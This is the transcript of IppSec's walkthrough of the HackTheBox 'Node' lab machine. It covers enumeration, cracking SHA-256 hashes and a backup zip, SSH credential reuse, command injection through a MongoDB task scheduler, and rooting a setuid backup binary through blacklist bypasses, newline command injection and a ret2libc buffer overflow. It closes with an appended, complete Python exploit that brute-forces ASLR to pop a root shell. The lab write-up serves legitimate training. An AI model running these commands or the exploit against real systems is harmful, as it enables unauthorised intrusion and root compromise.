HackTheBox - Node
00:45 - Beginning of nmap
03:00 - GoBuster (Fails)
08:15 - Screw GoBuster, BurpSpider FTW
09:12 - Examining Routes File to find more pages
10:10 - Finding Credentials and downloading backup
14:45 - Cracking the zip with fcrackzip
16:45 - Finding more credentials (SSH) within MongoSource
21:50 - Privesc to Tom User
35:04 - Analyzing Backup Binary File
36:49 - Using strace to find binary password
40:25 - Finding blacklisted characters/words
50:00 - Unintended method one, abusing CWD
52:20 - Unintended method two, wildcards to bypass blacklist
54:45 - Unintended method three, command injection via new line
59:15 - Intended root Buffer Overflow ASLR Brute Force
If you want to see more detail on the ret2libc check out October: https://www.youtube.com/watch?v=K05mJazHhF4&t=21m14s
What You'll Learn
The video walks through the HackTheBox machine Node: nmap and Burp enumeration of a Node.js/Express application, recovering SHA-256 password hashes from an exposed /api/users endpoint, cracking a password-protected backup zip with fcrackzip, reusing MongoDB credentials for SSH, escalating to the tom user through a MongoDB-backed task scheduler, and rooting the box via a setuid backup binary using three blacklist bypasses (relative paths, wildcards, newline command injection) and the intended ret2libc buffer overflow with an ASLR brute force.
Full Transcript
What's going on, YouTube? This is IppSec, and today we're doing Node from HackTheBox. I'm gonna be rushing through this box a little bit because it is Saturday at 11:00 a.m., which is after the time this box retired. Long story short, I thought Kotarak was retiring; it didn't, Node was retiring. So I was up until 4:00 a.m. today doing a video on Kotarak, not realizing that it was Node I should have been doing a video on, so I'm gonna rush through this machine. Thankfully rastating had published his write-up for it, so I learned one new method of exploiting this. I knew of two ways to do the binary at the end, but apparently there are three, so we'll be digging into all three right now. So let's jump in.

To kick it off we're gonna do an nmap. So I'm gonna make the directory nmap, and I'm just gonna nmap -p- to enumerate all ports, -T5 to make this go quick, -n to not do DNS, -vvv to make nmap verbose and show me ports as they come back, and the IP address of Node, which is 10.10.10.58. I forgot -oA to specify the output in all formats, and I'm going to call it initial, and we'll do no script, and take off this -p- so we're not going to do all ports, because I want this to be done quick. So it's gonna do the top 1000 ports, and we have that finished. So we have 22 and 3000, so I'm going to do -sC -sV for default scripts and enumerate versions. We can get rid of that -vvv, we do -oA, we can call this initial, and we're gonna do -p 22,3000. This shouldn't take too long. While that goes we can go to Node's IP address, 10.10.10.58:3000. I probably have to turn Burp proxies off, and we get a web page. Based upon the hostname I'm gonna guess this is Node. This nmap has finished; we do have 3000, Node.js Express framework, login, MyPlace, nothing too interesting. So I'm going to do a full port scan in the background: nmap -p- -T5, we don't need that, -n, nmap all ports, 10.10.10.58, and we'll name this "all". So let's look at this page. We got, well, a page, so let's GoBuster it.

So /opt/gobuster/gobuster -e, we will want to do -u for URL, http://10.10.10.58:3000, -w for the wordlist, so /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt. "Wildcard response found." So let's see what this is. That is odd, we don't get anything, but GoBuster says we get something. So what I'm gonna do is put GoBuster through a proxy, and to do that I'm just gonna use Burp and create a new listener. I'm sure there's a flag to do it in GoBuster, but I always just find this the easiest way. 8081, okay, strip that, and now if I go to localhost:8081, even if I disable my proxy it's going to still go through Burp. So we still get that. Let's turn intercept on and see what happens. So go to HTTP history, we're getting this file, and the response is some type of troll thing, which is interesting, because when we just used a browser to do it we didn't get that. So set proxy back on for this request, go, and we get a page. So looking at these two requests the main difference is the user agent. So let's just copy this user agent over to GoBuster and we'll see what happens. And we get that. So there is some type of filtering being put in place to stop GoBuster from doing enumeration. So to fix that, do the -H again, and -a is "set user agent string", so we're gonna be using that -a, and we'll put that in quotes. I copied too much; let's go back to Burp, copy this, paste, take the Accept off and the Accept down here, backslash, hopefully that escapes anything out. So now GoBuster is set to use a user agent and it still looks like it screwed up. Let's try this again. If we do -fw as it says, we get 200 responses back for absolutely everything, so we screwed something up. Let's go back into Burp and this app.js, send the request to Repeater, go. It doesn't look like it should do that if we get a random thing. Ah, so everything is returning a page, so GoBuster isn't going to be too handy. We could use DirBuster and filter by size, but we're just gonna skip over this whole DirBuster enumeration because it's giving us a lot of trouble.

So let's go to Proxy, Target tab, go to a page, and we got a bunch of junk. Let's delete the host, kill GoBuster and refresh the page. So we're going to use Burp to spider this host, and just click yes to add it to scope, and now we don't have to use GoBuster because we already have the page; we just won't find any hidden content. So since we're not going to be using GoBuster or DirBuster to find hidden content, what I'm gonna do is find the app.js, which should be in JavaScript, app.js. I'm gonna look at the response, so we can send this over to Repeater to make it a bit bigger, but this is gonna give us the routes for the web application and tell us a bunch of pages that we don't have. So we see a templateUrl of /partials/admin.html, and over in the Proxy or Target tab we don't have them in partials, so let's just go there. "Looks like this function doesn't work, only admin users have access to it," so we probably don't have permission. The next thing I want to look at: go back in Repeater, we have a profile and a home, nothing there, and we'll check out the home, nothing there. So let's go back into the Target tab and look at what else we have. We have /api/users, and we have this slash which has what looks like usernames and passwords. So we click go, let's make this a bit easier to read, we can set "\n" as newline. So we have the username, the myplace admin account, with a password of a long string. If we echo -n on that and wc -c we have 64 characters. So I'm not exactly sure what this is; it's an even 8 and they're all evenly divisible by 8, and all the accounts are that, so I'm gonna assume it's some type of hash. We have is_admin true for that myplace admin account; for tom, admin false; mark, false; rastating, false. We have a bunch of passwords and user accounts, so let's figure out what this hashing algorithm is. There are two ways we can do this: we could just go to Google and type like "hash identify github" and use an online hash identifier (but not online, use a hash identifier), or I mean just go to hashes.org and submit the hashes and see if it actually cracks, and why, because they have a relatively complete or a good dictionary or whatever. So we can submit up to a thousand hashes, so let's copy them, and the final one, let's share the algorithms it found, and submit. We see it is just SHA-256 plain, and we have three of them: we got manchester, spongebob and snowflake. So the myplace admin, dff..., is going to be manchester, f0... is gonna be tom's, that is spongebob, and the next one would be mark and his password is snowflake. So since the myplace admin is the admin user, let's do that account. So proxy set to off and we can log in. Let's turn spider off for now, or we can just have spider not submit forms; I hate when my spider submits forms. Let's go back to it. Well, again I have the password in my clipboard, so paste that, and we'll go back here, copy the admin account, log in, and we can download the backup.

So clicking "download backup" we get a save prompt, and then we can just copy the backup into our new directory. If we do a file on it we get "ASCII text with very long lines"; looks like it's just base64. So base64 -d myplace.backup and redirect that to... I don't know exactly what that is, so I just called it unknown. If we do a file on that we got it as a zip archive, so we'll move it to backup.zip. If we unzip it, we have a password on it. So what we can do is use fcrackzip, and we want to specify -D for dictionary and then -p for the wordlist, and we do /usr/share/wordlists/rockyou.txt, and of course we have to specify the zip file. So it looks like "magicword" may be the zip password. So unzip again, type magicword, and it looks like that was indeed the password. So now we have the source code to the application.

So what I want to do is search for password, so I'm going to grep -R, well, I could make it case insensitive, for password, and do . to get everything, and it looks like we got quite a bit of junk. So just pipe that to less and we'll go through it. We have a MongoDB thing, bunch of stuff in JavaScript, the web page, so we've got more stuff and then junk. So let's find out where the connection is controlled. So we look at app.js, we do have the client and we have potentially the password, so mark and then this string, and that's going to localhost:27017. If we go back to our nmap scan, we scanned all ports, we only have 22 and 3000 open still. So let's just try SSH-ing with those credentials. So if we get mark out of app.js, we will see... 10.10.10.58 I think is the IP. We can log in to the box with that password, so he reused his MongoDB password as his local user password.

So I want to do a vertical split, I'm gonna LinEnum and do... I've landed, I'm here, yep. So before I do that, ifconfig tun0, get my IP address, and then we just do python -m SimpleHTTPServer, and we'll curl 10.10.14.3:8000/LinEnum.sh and pipe it to bash. And what we're doing here is just checking for common privescs, see if we see anything interesting. So we can go to the top and begin searching through this. So going through this we can see the kernel, 2017, so relatively recent, probably not going to be a kernel exploit. It's Ubuntu 16.04.3, hostname node, current user mark, in group mark, and in the group mark. There's a connection to 10201, I don't know what that IP is, that's an odd IP, from tom. We also logged in, mark. Group memberships: we have lxd? Where is that? No, one... so we probably don't have that privesc from Calamity. Relaxed home directory permissions on frank, mark and tom, so I probably should look into those home directories. Environment variables, cron jobs don't look like they have anything unique. We're looking at the ports: we have that high-numbered port listening only on localhost, 27017, I believe we said that was based upon the app.js we looked at. Processes: we have a node scheduler running as tom, so we probably want to look at this, /var/scheduler/app.js, file config, and it looks like we have someone else on this, 10.10.14.7, because there's a reverse shell going on.

But let's take a look at that. So less /var/scheduler/app.js, you can see what's going on: it's connecting to MongoDB as mark, taking everything in the tasks collection and then passing it to exec and then deleting the tasks. So it looks like this scheduler will run a command once, and this exec is probably going to be a shell command. So let's take a look at that. I'm gonna cat the scheduler so we can copy the password, and we want to copy this and do -p, because then it asks for a password, -u mark, when we connect to the scheduler database as indicated right there, well right here, and the password. Login failed; I copied too much. Copied too much again; if I could actually read what I was highlighting it would be amazing. So mongo -p -u mark scheduler, and we get connected in. So what we have to do is create a document now. So let's see, it's looping through the docs, and we're going to create one with the parameter cmd. So db.tasks, yep, I got tasks from this db collection, and we want create, now is it insert? Yes, we got insert command, and Mongo likes everything in JSON, so insert cmd: and we want to do something like, we can copy bash, so cp, let's see, okay, just do which bash, then cp /bin/bash to /tmp/ipsec, and we will chmod 6755 /tmp/ipsec, and I will end that with a semicolon. That looks good; we inserted one command. So if we do db.tasks.find() we can see our command is there, and we'll give it a little bit of time to see if it executes. The reason why I use bash is because bash normally doesn't drop the setuid bits, and the setuid bit I'm doing is 6, which is both user and group; user is 4, group is 2, I think 1 is a sticky bit, which is a bit different. We can see db.tasks doesn't have it, so I'm gonna press Ctrl-D to exit, and I'm gonna see if /tmp/ipsec is there. It is, and tom owns it. And the reason tom owns it is, again, from our LinEnum checker, if we ps aux and grep sched, we see that tom is running the scheduler; that's why we started looking into it. So if we just execute /tmp/ipsec we are now... mark? Wait, let's see who we started as. That's not right. Tom owns it and it does not have the setuid bit on it, that's odd. I guess we'll go back in and try this again. /var/scheduler/app.js, mongo -u mark -p scheduler, copy the password, db.tasks.insert cmd chmod, we'll just do it this way, and I forgot to make it JSON. db.tasks.find, find, looks like it ran. ls -la /tmp/ipsec, sticky bit, setuid, know that flag, there we go. I guess that's specified with that -p flag, but now the effective UID is tom. So we do whoami, we are now tom.

So now that we're tom, let's go into a home directory, cd /home/tom, and create the .ssh. Can't do that; looking at permissions of the home directory, everything's owned by root and we don't have write access to our home directory. What I wanted to do is just drop an SSH key so I could SSH in as tom, but can't do that. So let's curl 10.10.14.3:8000/LinEnum.sh and run this again and see if we have anything interesting. So kernel information, we looked at that, hostname, group, path, shells... I'm just looking at the red text to see if there's anything we haven't really looked at, and I'm looking for like setuid or SUID in particular because we haven't looked at those files yet. File locations, nothing. Let's do this manually: find / -perm -4000. So we do have setuid bits on files; I don't know why it didn't show in the linuxprivchecker script or LinEnum. So let's check that out: setuid, camelcase, "suid", okay, found it here. So we do search for setuid files, oh, thorough equals 1. So if we go to the top we do see options, keywords, export, report name and stuff, but -t includes thorough lengthy tests, and if we have that option it sets thorough equal to 1. So let's do that, just hardcode it; the alternative would be to download the script and use the actual command line flags, but I'm okay doing it this way. So curl 10.10.14.3:8000/LinEnum.sh, and it's cute. So let's see what the setuid stuff looks like in this script directory. There we go, we have setuid files and setgid files. So looking at these we do have one that I don't recognize, /usr/local/bin/backup; it's owned by a group and the group is admin, and admin can execute it. So we should take a look at that. We also have a shell, but let's take a look at this /usr/local/bin/backup.

So first, run groups: we're still in the mark group, we have to escalate up to what we'll call the admin group. So let's chmod g+s on /tmp/ipsec and then exit, /tmp/ipsec -p, id. Doesn't seem to work. Let's see, let's remove the sticky bit, or the setuid bit, I always call it sticky, and then chmod 6755 /tmp/ipsec so we can set it, chown tom:admin, whoami, I am tom. I cannot change it even though tom is a member. So let's use... to change that, so my effective UID is only going to be 1000, so if I do that I don't have the group ID, so that's why my chmod isn't working. So let's get /var/scheduler/app.js, mongo -p -u mark scheduler, password this, and then db.tasks.insert, because this is probably going to have all the permissions of tom. So we want to do another cmd and we'll do chown tom:admin on /tmp/ipsec and then we have to chmod 6755 on /tmp/ipsec, oops, that should be good. db.find, whoops, there we go, db.tasks.find, looks like it's all the way around. So ls -la /tmp/ipsec: tom admin. So let's execute that with -p, id, and we're now in the admin group. So I couldn't change it to admin before because I was not in the admin group to change it to, but again the scheduler is running natively under tom so he has all the group permissions set to him, but now that we have that group we can now do /usr/local/bin/backup, and we get nothing. /usr/local/bin/backup /, still nothing. That's a permission denied; oh, when I did bash it removed it. /usr/local/bin/backup -h, still nothing.

So what I'm gonna do is base64 /usr/local/bin/backup, I'm gonna copy this... actually that's pretty big, so we'll just use netcat to transfer it to the box. This is nc -lvnp, listen on 8081, I guess we'll call it backup. Port already in use; that's right, Burp is using that. 8082. And we'll do nc 10.10.14.3 8082 < /usr/local/bin/backup. So md5sum backup, md5sum /usr/local/bin/backup, we have the same file, and now we can begin analyzing exactly what backup does. So let's make this executable with chmod +x backup and then execute it. We get absolutely nothing back, so let's run an strace on backup, and it doesn't really do anything and exits gracefully. So let's analyze the assembly. So radare2 backup, analyze with aaaa, print out the function list with afl, and we can do VV, data visualization mode, scroll down, so with the asterisk, s main, and then you can do spacebar to change the view and we get into a pretty call graph... I think it's a flow graph, whatever this is called. We get into this function view and we can see that there is a jump right here and it goes straight to an exit, and if that is not equal to three arguments it looks like it takes that path. So let's open a new pane and I just give backup three arguments, and we get "could not open file". So let's do strace to see what file it is, and we see it's trying to read something in /etc/myplace/keys. So if we go to the box and cat /etc/myplace/keys we get this file. So let's copy this out, go into our box, mkdir /etc/myplace, vi /etc/myplace/keys and paste it.

The next thing is something we should have done a while ago, and that is go into the app.js. So I forget exactly where this is, yes, do we have, okay, so /var/www/myplace, and now we can grep -i backup, and let's do capital R for recursive, and now we're looking at how backup actually works. So in app.js we see the function that we want, so const backup_key is equal to 45fac..., and if we look at /etc/myplace/keys that is one of the keys. So here is the blacklist for dirbuster, parse-something, I'm guessing this may be gobuster, I know there's "go" that blacklists GoBuster, backup, and we can see the code for the backup piece. Now it's gonna spawn /usr/local/bin/backup, -q, the backup key, then the directory name. So if we go to backup we can do ./backup -q, the key (it could probably be any one of these keys), and the directory name, so let's do /root, and I know my root directory is a lot bigger than this. So let's unzip this, un-base64 it and see what this is: so unknown.b64, base64 -d unknown > unknown, file, it is a zip, so let's move unknown to unknown.zip and unzip this. It's skipping something, so let's try 7zip, and a password, probably magicword, that was the password we had before, and it decompressed it. So it looks like root.txt is in that, and we get a troll face. So that's obviously not what it was supposed to do. So let's remove unknown and check out what is going on with this binary.

So it looks like if -q is there then this won't happen, and this is the computer graphic. And did we do that? Yes, and if we remove -q we need three arguments, then we get that computer graphic. Okay, so we know what's going on right here. Scroll down, so after that computer graphic we jump here, it's doing a bunch of things, we get a call to fopen right here, so I'm guessing this is probably where we are reading the /etc/myplace/keys, just going around, and this would start to get interesting. After this we'll load it into Binary Ninja because it makes it a bit easier to read; I just want to show you the free way to do it. So right here is kind of a sanitization thing, we can see radare being nice and telling us exactly what would be here right now. It is, I think, two periods; if it's two periods they go all the way over here, come on, there we go, and it's pushing that base64 string of that troll face. So I'm sure there's a way in radare we can make this print a bit nicer, but that's what's going on. And we can go down, we can see /root is also there, so we can't do bad characters, .., /root. Let's see what else. This is a bit painful to view but this is what you get for being free, and it's actually doing something better than what Binary Ninja would do. So we have another one, it's a semicolon, and we can verify this by just saying, hey, if we do / something, "Target path doesn't exist"; /root, it does; "ruh" doesn't exist; it was a semicolon, and bash... did that actually work? I don't think it did, but it may have. There's no way... I'm gonna try this real quick. Let's go over to SSH, /usr/local/bin/backup, one, we can do -q, let's see, cat /etc/myplace/keys, backup -q and... nope, oh, I'm an idiot, that has to be in quotes. Wait, we need three arguments, yeah. So what happened here is I don't have this in quotes, there we go, and that's the troll face; we saw that because that semicolon is a bad character. Hopefully that makes sense. We also have "&" as a bad character, see, another bad character, and again I'm just going through and looking at what Binary Ninja says are bad characters, and every one of these is going down to that base64 junk. See, pipe is a bad character, see, this is going to an actual memory address, that is as well, that's a bad character, so you get the gist right there.

So I'm gonna open up Binary Ninja and we're gonna analyze this file with that tool, because it's a bit more friendly in the video, mainly because I know it better. As you can see I'm having trouble even just getting out of this, oh there we go, just q. So open Binary Ninja, we can open the file and we can see this is a much more friendly input, but it's not auto-expanding some things like we saw a q over here, so maybe we can edit Tools, Analysis, module, linear sweep, maybe, no, maybe it's in a future version, I don't know. So that's the call to exit, skip down here, okay, this is where we have the blacklist, because we can see, let's see, is this the first one, "could not open file", that's a magicword, here we go, all these: if the string exists, go down here, and that's the base64 we don't want to hear. So let's zoom back in, we can see push and then 2e is what this is pointing to. Finally radare was actually showing us what this was, but 2e, let's see what that is next to ASCII: 2e is a period. That doesn't look right, what did we say was just before /root? Two periods. Oh, 2e 2e, I wasn't looking at the next byte, I wasn't looking at the next string. So this is the two dots, we have /root here, so it detected that one. This push 3b, I'm gonna guess that is a semicolon, yes. Then we have the next, 26, that is going to be ampersand, 60 is gonna be the backtick, 24 that's going to be the dollar sign, and let's just spot-check that, yep, 7c, then we get to the string, this is going to be double slash, and I'm just reading at the very beginning, 2f 2f, and then the null byte, the null byte terminates the string, so it's gonna be double slash as a bad character, and then this, maybe just slash is a bad character, /etc is bad, and now we're getting into the next piece, we're actually doing the backup. So just / and /etc, so there's all the bad characters we have. Now it's assembling the string and we're calling /usr/bin/zip with the password of magicword and the user input.

So if you noticed we don't have just "root", we have "/root" as a bad character. So if we go back to our SSH, and I'm just doing that so I have it on my terminal, cd / and call /usr/local/bin/backup -q, copy this, and just say root, because we're at / and it's not changing the directory before it, so it goes, well, current working directory is /, and we get a bunch of base64. We can copy this, I don't know what I just clicked, my hand slipped, copy, vi test.b64, base64 -d > test.zip, and then unzip test.zip and the password is magicword, and we see it did unzip root.txt. If we do a wc -c, character count, on root.txt we get 33, and that's got a line break in it, so chances are that's an MD5 sum in that file. So that is the first unintended way to do this binary.

There is another way, an unintended method, of this binary; we're gonna do like 30 unintended methods and then the intended, which is a buffer overflow. So the next unintended method will be abusing wildcards, and I notice what I did, and I open that in a new terminal window. So wildcards: if we look at our bad characters we have /root, but if we do like cd /r??t, like that, we just go to the directory, and that only works because there's nothing else in / that has that name. So if we mkdir /rppt and we try to cd to that we get "too many arguments", because ls /r??t, oh, so just ls that directory, I realize because ls went into two different ones: we have that /root and then this last /rppt, so it matches two things. Hopefully that makes sense. So let's remove /rppt and go back to our SSH, run this command again, and we'll do /r??t. That is the troll face, so I think we may have to specify the entire file. There we go, we got a different output. So we specify the entire file, we get this, we copy this out, the zip.b64, that's a bad file name but oh well, zip.b64, what do we want to call this, root.zip, unzip root.zip, file root.zip, ASCII text, oh crap, base64 -d, unzip it, magicword, replace, sure, it extracted. If we do a wc -c we get 33 characters again, that's an MD5 hash because there is a line break in that file. So that is method two.

Method three is through command injection. So if we look, we don't have it filtering any newline characters, and it's just calling, where is it, system. So system will also allow us to do a newline to execute code. So that would look like if we had bash, newline, id, and then the second command. So that's how that one works, and I know we can do it through printf, but I want to try something, so let's, no, I think we have to do it through that, but anyways, this is one of the famous Nagios exploits; if you look at NRPE it was vulnerable to this, and if you haven't, just Google like "NRPE command injection vulnerability", it's like, I don't want to say 2014, maybe even older, NRPE CVE command injection 2014, but this is the most common time I've seen this exploited, against that software in particular. So to do that I'm gonna look back at Binary Ninja and look at the zip function, and it's truncating that because it's very long, and we see the full command is /usr/bin/zip -r and we're redirecting to /dev/null, and then again the string terminator here. So the string is, I can't highlight this way now, but anyways, since it's redirecting to /dev/null we're gonna do three parameters or three lines. So let's go back to SSH and I'm gonna try something real quick before we do it, we'll try an easy way, just put a double quote here and we're gonna do junk, then /bin/bash, and then junk, and we did that junk at the end for the third line because again Binary Ninja is telling us it ends it with /dev/null, so that's how it ends. So if we didn't add that third line, that /dev/null would be on /bin/bash. And that does work, so we don't have to do printf, we can just do it with quotes, and we are now UID root, and we could just go to /root now and look at root.txt. If you didn't want to do it that way you could just printf and do it this way, that should be it, yeah, that works as well. And the reason why we didn't get hit by the blacklist, because dollar sign is on the blacklist, is that the terminal is interpreting this before we send it, and printf is just a function with which we can test newlines. What do I need, single quotes? Oh, I have print, not printf. But yeah, printf just requires that line break and allows us to do that. If we did an echo, I don't think it obeys newlines; no, it does not, so that's why I said printf earlier. So that is probably the coolest way to do the binary.

And then we have method number three, which is gonna be the hardest method to do, and that is the buffer overflow. So the first step is to check what compile-time instructions, or compile-time protections, are enabled, so we just run checksec on it and we see that DEP is enabled and ASLR is not on this binary. So if we delete all breakpoints, okay, we don't have any, we can set a breakpoint for main, run this, and then do jmpcall and see if we have any jmp esp's, or got lucky there, because this binary probably isn't gonna be randomized, I don't think it can be, but we don't have any dangerous instructions right off the bat. So the next easiest thing is to do like a return-to-libc attack with brute-forcing, because we have unlimited tries at this binary. I think October did this, one of my videos, early videos, did this; I want to say October but it may have not been, but I'll put it in the description, because I'm gonna go a lot more into ret2libc back then than I am now. So I'm kind of gonna rush through this and instead we'll look at some static analysis.

So we'll go back to Binary Ninja and let's look at a vulnerable function: strcpy, this should be strncpy, and then we're going to look at something we can recognize. So "display warning", don't know where that gets displayed, "success", don't know where that gets displayed, "target", I know exactly where this is, so we're going to target this one. And we have us making space on ESP, which is the effective stack pointer, 208, let's see, 512 is 200, so 208 would be 520, then we're gonna free up an additional few bytes and then push stuff to it, so I want to say like 508 maybe, I don't know, but between 500 and 600 we have a buffer overflow right here. So to figure out how to get to display_target we can go to display_target and main and see there is a function just before it. So let's run our backup script twice and see if we can get it to display what we're archiving. So cat /etc/myplace/keys, okay, and then we want to call /usr/local/bin/backup with -q, the key and root, we don't get anything, cd /, we don't get much output at all. So let's remove that -q, don't get anything, we need three arguments, so we'll do ipsec, I think it could be literally anything, "started archiving root". So this is where the buffer overflow is: if we go back into display_target, "starting archiving %s". So we can't have that -q flag there, we just have to put anything else in its place.

So let's go back to gdb and let us delete the breakpoint on main, and we'll do pattern create 600, let's get rid of that, and now let's call this. So run, we'll do ipsec, the key on this I think is ABC, and paste this. This has special characters so we need to put this in quotes, and... it never said that, it just said "validating access token" and "encoded backup is below", but this, we just hit the bad characters. So we had one of these bad characters in our string, I don't know what it was, maybe percent, oh, semicolon, I see a semicolon like right there, is that the only semicolon? We have a dollar sign too. Glancing over this, hopefully this doesn't screw anything up, paste, there's... still nothing, so we still have some bad character. See, does pattern create have a bad character flag? It does not. So we'll just do python -c 'print "A"*520', paste, and we'll see if this crashes the program. run ipsec ABC, 520 A's, we do get a segfault. So let's change that to 510, we did crash but we didn't fully overwrite EIP because we don't have 41 41 41 41. So let's try 515, there we go, we have three 41s, so if we do 516, run ABC, now we have a full EIP overwrite. So we can print 512 A's then four B's, there we go. And the last thing I want to do is, I had changed my /etc/myplace/keys to make it easier, but what we're going to do is revert that, so vi /etc/myplace/keys, and I'm just doing this in case for some reason it affects the stack; I want to make it as close to production as I can. So let's take a key, it has to have ABC, put this, and we're still good. So we know at 512 A's, I should have saved that, so 512 A's equals junk, after that, bytes 513 to, was it 517, equals EIP overwrite. Okay, so we have that in our notes.

So we've got to make the skeleton exploit and search for all the return-to-libc addresses. Instead of creating a new exploit let's just look at my October stuff, and I do have a buff.py in October, and again this is where I did a return-to-libc, so we're gonna use this as the skeleton exploit. So we're gonna copy this over to the box, so vi buff.py, paste this, okay, and I am in /dev/shm, that's why I can write, and I'm also... I do a nested tmux, "can't create socket, permission denied", done, so we'll just have this. :set paste, I'll paste it here so we can do stuff side by side. So the first thing I have to replace is that libc base address, and we got that by doing ldd /usr/local/bin/backup and grep for libc.so.6, and that's going to change constantly because of ASLR, but one in like 250 times we'll get it correct. So again, if you don't know any of this I recommend watching October. So the system offset, that is gotten by, I think, readelf -s /lib32/libc.so.6 and grep for system, okay, we want this one and not... copy, if I'm not in the window, huh, there I am, I need that 0x. We don't need exit but I want to see if we can get it quickly, exit, I think it's this one. And the argument offset, this will be /bin/sh, and that's what changes a little bit; we do strings -a -t x /lib32/libc.so.6 and we grep for /bin/sh, and that one is 0x15900, just make this pretty, I think that's right. Okay, we'll send, let's see, send 512 A's, and I don't know if that's right, trying to think real quick if we have to go back a word, I think that's right. So after 512 A's we write our system address, and then we also put exit and the argument, I think that's right, if not it's 504 or something, but we'll try this. So /usr/local/bin/overflow, this is now backup, and then ipsec is one argument, the key is the other, and then buff. So cat /etc/myplace/keys, do that, i += 1, fix that bug, and I guess we can try this. Do this so I can copy it, nested up, I need only a file, we'll call this exploit.py, python exploit.py, and "must contain only two arguments", so I screwed up this call. It's binary, then, I guess, read-only file, sweet, I guess the umask is weird on this or something. So ipsec, space, space, plus buff, uh huh, I'm screwing up my call somehow, not exactly sure how I'm doing this. Let's see, so I'm pretty sure I had it right the first time, you can do multiple arguments here, so let's fix this, then we can do type(buff) and run this, we gotta print it, okay, it is a string, and it's saying "execv() arg 2 must contain only strings", so let's verify it's still a string when it makes its way in here, whoops, it is not. So let's see, that is odd, let's change that back to buff, let's start commenting this stuff out. Okay, it likes the A's, likes the A's plus system address, it's fine with that, if this works I'm going to be so baffled, no, so as soon as it hits that argument it starts having an issue. So maybe we can add a trailing B to the end of this, huh, that's the exact same code as all the other function pointers, just gonna add a B there, don't think that would do it, oh, it's working now. So one thing I want to do, whoops, now take that print after the call, done. I was hoping I could try to get it so we can see the try number but it doesn't look like we can because this ASCII is just too big. So at try 51, but it's gonna try a few hundred times and maybe we'll get lucky and hit the address, and hopefully adding the B there did not screw up everything, I don't think it did, but no clue what was happening there to be honest. And it should hit sometime soon, we're at 127, this is the dangerous thing with brute forcing, yeah, so, uh, see, it's hanging, it's no longer "starting archive", it died. Let's try again, and we immediately get it, that was odd, no clue what happened, but as you see we are now root, we can go into /root and we could also get the flag. So hope you guys enjoyed that video, I feel like this has been a really long time, so yep, I'll see you guys next week with hopefully Kotarak.
it is that box that gets retired well the video is done so my week will be easy take care guys later
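As an added example, not IppSec's buff.py/exploit.py (neither script is reproduced on this page), here is the shape of the ret2libc chain and ASLR brute-force loop the transcript describes, in Python 3. Taken from the transcript: the target /usr/local/bin/backup, the argument order (anything, key, overflow string), and the 512 bytes of junk before the saved EIP. Assumptions of mine: the libc offsets are parameters (read them from readelf -s and strings -a -t x on the target; the values in the usage are placeholders), and success is detected by the child not being killed by a signal, which is a heuristic. The check the script adds that a practitioner wants: the three addresses travel through argv, so none of them may contain a 0x00 byte, because execve() treats NUL as end of string and the chain would be cut short.

```python
#!/usr/bin/env python3
"""ret2libc payload + ASLR brute-force loop for a 32-bit setuid binary.

Added example, not the original video's script. Assumed from the transcript:
the target is /usr/local/bin/backup, invoked as
    backup <anything> <key> <overflow-string>
and the saved return address sits 512 bytes into the third argument.
The libc offsets passed in are whatever `readelf -s` / `strings -a -t x`
report on the target; the values shown in the usage are placeholders.
"""
import struct
import subprocess

JUNK_LEN = 512                     # padding before the saved EIP, per the GDB pattern work
TARGET = "/usr/local/bin/backup"   # assumed path of the setuid binary


def p32(value):
    """Pack a 32-bit little-endian address."""
    return struct.pack("<I", value)


def nul_free(data):
    """argv strings are NUL-terminated by execve(); a 0x00 byte truncates the chain."""
    return b"\x00" not in data


def build_payload(libc_base, system_off, exit_off, binsh_off, junk_len=JUNK_LEN):
    """junk | &system | &exit (system's return address) | &"/bin/sh" (system's argument)."""
    payload = (b"A" * junk_len
               + p32(libc_base + system_off)
               + p32(libc_base + exit_off)
               + p32(libc_base + binsh_off))
    if not nul_free(payload):
        raise ValueError("payload contains a NUL byte and cannot be passed via argv")
    return payload


def crashed(returncode):
    """True when the child was killed by a signal (a wrong libc guess usually SIGSEGVs, -11)."""
    return returncode < 0


def run_once(payload, key, target=TARGET):
    """One attempt; True when the child did not die from a signal.

    stdio is inherited on purpose: when the guess is right, system("/bin/sh")
    drops you into an interactive shell here. Heuristic only: a wrong guess
    that happens to exit cleanly is reported as a hit as well.
    """
    proc = subprocess.run([target, "ipsec", key, payload])  # bytes are accepted in argv on POSIX
    return not crashed(proc.returncode)


def brute_force(payload, attempts, runner):
    """Re-run the same payload until runner() reports success; attempt number or None.

    The hard-coded libc base never changes. 32-bit ASLR leaves only a few
    hundred candidate bases (IppSec's "one in like 250"), so re-executing the
    binary until the loader happens to pick the base we guessed is the attack.
    """
    for attempt in range(1, attempts + 1):
        if runner(payload):
            return attempt
    return None


if __name__ == "__main__":
    import sys
    # usage: exploit.py <libc_base> <system_off> <exit_off> <binsh_off> <key>  (hex offsets)
    base, system_off, exit_off, binsh_off = (int(x, 16) for x in sys.argv[1:5])
    key = sys.argv[5]
    chain = build_payload(base, system_off, exit_off, binsh_off)
    hit = brute_force(chain, 1000, lambda p: run_once(p, key))
    print("hit on attempt", hit if hit else "none")
```

Keep the junk length and the offsets as variables rather than editing the byte string by hand; the transcript's "if not, it's 504 or something" is the kind of off-by-a-few that is easier to fix when the padding is one constant. If build_payload raises because an address contains 0x00, that libc base cannot be delivered through argv at all, and a different gadget or delivery path is needed rather than more attempts.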